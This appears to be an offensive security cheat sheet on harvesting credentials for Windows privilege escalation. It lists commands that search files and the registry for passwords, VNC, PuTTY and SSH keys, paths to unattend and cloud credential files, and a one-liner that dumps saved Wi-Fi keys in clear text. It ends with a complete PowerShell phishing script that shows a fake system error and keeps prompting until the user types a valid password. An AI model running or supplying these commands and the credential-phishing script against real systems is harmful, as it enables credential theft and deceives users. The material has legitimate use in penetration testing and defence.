Low hanging fruit such as passwords may be exposed to a low privileged user which can be abused to escalate privileges. One way we can search for such passwords is this command.
Copy dir /b /a /s c:\ > c:\temp\c-dirs.txt
type c:\temp\c-dirs.txt | findstr /i passw You can also replace passw with : ssh, vnc etc.
Interesting files that may contain sensitive info are unattend files:
Copy C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf You can search for these files with:
Copy dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul More interesting files are:
Copy VARIABLES.DAT
setupinfo
setupinfo.bak
web.config
SiteList.xml
.aws\credentials
.azure\accessTokens.json
.azure\azureProfile.json
gcloud\credentials.db
gcloud\legacy_credentials
gcloud\access_tokens.db Sensitive passwords may also reside in registry:
Copy reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s We can also look for vnc credentials and ssh keys
(a good tool for this is https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1)
Copy reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query "HKCU\Software\OpenSSH\Agent\Keys" WIFI passwords may also be the same as the web page passwords:
Copy cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on You can simply make a credential popup and pray that the user enters their creds into the popup, an implementation is here:
Copy # POC from greg.foss[at]owasp.org
# @enigma0x3
# Adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/
# https://enigma0x3.wordpress.com/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/
function Invoke-Prompt {
[CmdletBinding()]
Param (
[Switch] $ProcCreateWait,
[String] $MsgText = 'Lost contact with the Domain Controller.',
[String] $IconType = 'Critical',
[String] $Title = 'ERROR - 0xA801B720'
)
Add-Type -AssemblyName Microsoft.VisualBasic
Add-Type -assemblyname System.DirectoryServices.AccountManagement
$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
if($MsgText -and $($MsgText -ne '')){
$null = [Microsoft.VisualBasic.Interaction]::MsgBox($MsgText, "OKOnly,MsgBoxSetForeground,SystemModal,$IconType", $Title)
}
$c=[System.Security.Principal.WindowsIdentity]::GetCurrent().name
$credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName")
if($credential){
while($DS.ValidateCredentials($c, $credential.GetNetworkCredential().password) -ne $True){
$credential = $Host.ui.PromptForCredential("Windows Security", "Invalid Credentials, Please try again", "$env:userdomain\$env:username","")
}
"[+] Prompted credentials: -> " + $c + ":" + $credential.GetNetworkCredential().password
}
else{
"[!] User closed credential prompt"
}
}
